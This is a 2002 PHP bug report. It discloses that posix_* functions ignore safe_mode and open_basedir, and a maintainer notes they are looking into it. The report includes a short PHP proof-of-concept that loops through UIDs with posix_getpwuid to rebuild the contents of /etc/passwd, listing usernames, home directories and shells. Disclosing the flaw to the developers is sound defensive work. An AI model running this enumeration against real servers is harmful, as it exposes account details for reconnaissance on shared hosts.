ID: 16733
Updated by: [EMAIL PROTECTED]
Reported By: [EMAIL PROTECTED]
-Status: Open
+Status: Analyzed
Bug Type: *General Issues
Operating System: Unix
PHP Version: 4.2.0
New Comment:
Hmm. I was under the impression ext/posix is disabled non-cli SAPI's.
Checking this out.
Previous Comments:
------------------------------------------------------------------------
[2002-04-22 12:53:42] [EMAIL PROTECTED]
I noticed that many of the posix_* functions DO NOT check wether
safe_mode or open_basedir restrict access to the user database thus
allowing a user to rebuild a complete /etc/passwd without permissions
to read /etc/passwd or access the /etc directory.
This is dangerous in some cases where login are kept secret as it
allows a user to know what accounts have what privileges and what
accounts have access to a shell or not.
For now there is only one thing to do, disable these functions but i'm
pretty sure that adding checks to see values of safe_mode and/or
open_basedir would be a nice thing to do.
Here's a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user homedirectory:
<?
for ($i = 0; $i < 60000; $i++)
{
if (($tab = @posix_getpwuid($i)) != NULL)
{
echo $tab['name'].":";
echo $tab['passwd'].":";
echo $tab['uid'].":";
echo $tab['gid'].":";
echo $tab['gecos'].":";
echo $tab['dir'].":";
echo $tab['shell']."<br>";
}
}
?>
On a very large system, if an execution time is set, this will not end
up, but hopefully the posix_getpwent() function is missing so the user
has to go through all possible uid's.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=16733&edit=1
